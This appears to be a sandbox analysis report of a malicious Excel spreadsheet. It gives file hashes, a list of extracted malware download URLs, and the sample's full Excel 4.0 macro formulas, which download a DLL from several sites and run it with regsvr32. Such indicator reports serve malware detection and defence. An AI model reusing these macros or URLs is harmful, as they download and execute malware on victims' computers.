General
-
Target
100af46515041e4e0e17e773dfa609ecc4b028e47d1d435a71962fcd346d7e9f
-
Size
20KB
-
MD5
08c636c1625fbfd35b80b4177be7aac3
-
SHA1
c75762ab872b8fe19d3284552bbd95bd0f68f500
-
SHA256
100af46515041e4e0e17e773dfa609ecc4b028e47d1d435a71962fcd346d7e9f
-
SHA512
58d9fb2db8037b1d63c6f05c11ae7d790cceb515fa1a4b7cf4ba06c9b5335243ef65e2cd267478a04c4ee83ffff7b5415f00af78b950de6aec6f01d6a044aa4d
-
SSDEEP
384:iVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:KINco4FLhnCBn9kC+xbLv
Malware Config
Extracted
https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/
http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/
http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/
http://aslar.dk/lj/AFAQXrxdyafuA3kn/
https://assf.com.ng/2021/coY6141cNQXQYGrob4o/
http://barth1.dk/_vti_cnf/AEyc6G/
https://www.baligrod.pl/wp-admin/QDSXoxha21C55/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aslar.dk/lj/AFAQXrxdyafuA3kn/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://assf.com.ng/2021/coY6141cNQXQYGrob4o/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://barth1.dk/_vti_cnf/AEyc6G/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.baligrod.pl/wp-admin/QDSXoxha21C55/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
100af46515041e4e0e17e773dfa609ecc4b028e47d1d435a71962fcd346d7e9f